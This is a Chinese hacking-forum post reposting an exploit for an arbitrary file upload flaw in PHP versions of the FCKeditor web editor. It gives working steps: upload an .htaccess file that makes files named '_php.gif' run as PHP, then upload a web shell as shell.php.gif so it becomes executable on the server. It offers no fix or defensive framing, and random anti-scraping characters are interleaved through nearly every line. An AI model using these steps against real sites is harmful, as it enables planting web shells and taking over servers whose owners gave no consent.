找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2212|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞% `4 w8 {0 L5 m( o6 V; L7 _" t; s# R
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
/ M2 y$ p3 y. r. ~" n, k9 D减小字体 增大字体# v/ L3 L# Y( k  Z
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
) Q) H$ B2 d8 q[+] Date: 2011
8 G. [8 @6 o' w; ^6 F. R, ?5 K9 y! f[+] Author : sinesafe.cn
$ C$ N1 Y, p' X' }: [[+] Website : WwW.sinesafe.cn# m/ @7 a: f. L  g; X+ t
———————————————————3 }7 }" C* V3 ]$ q; i
1.create a htaccess file:& K+ s( H( l* r: N2 F7 d5 F9 Z$ y
code:
, P3 d* Z0 h3 L& r% f7 s<FilesMatch “_php.gif”>$ Q. y; Q) z5 m5 U8 L" x
SetHandler application/x-httpd-php7 }" J  u) i; {2 r5 |3 ~
</FilesMatch>
3 V( g2 ]4 M) X7 ?! {4 b
; N. u* D: s  V. z! h3 J8 |# o2.Now upload this htaccess with FCKeditor.
: Q4 v% D7 `) F8 m
2 `1 Z9 K4 v3 chttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html5 N' m% X2 k1 y. `
& H2 V" B5 S0 o6 l
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
' \' i) O) x. o0 L, z3 _
! ]% F  j5 V7 \* c) k' S———————————————————————————————-
  l# s9 \4 B& z- V. X3.Now upload shell.php.gif with FCKeditor.# [8 u$ A5 S7 ]- h) A5 S
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.9 [$ [; c1 t4 L. m
5.http://www.sinesafe.cn/anything/shell_php.gif7 W0 U( A: l, @4 ^5 i9 n4 d& \. @: E$ n
6.Now shell is available from server.
7 a( |0 s( A' f: s* A% z1 T

+ E" A7 {# Y( j2 r' X4 P  ?
1 G9 c3 ~3 f4 g6 U3 [7 g
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表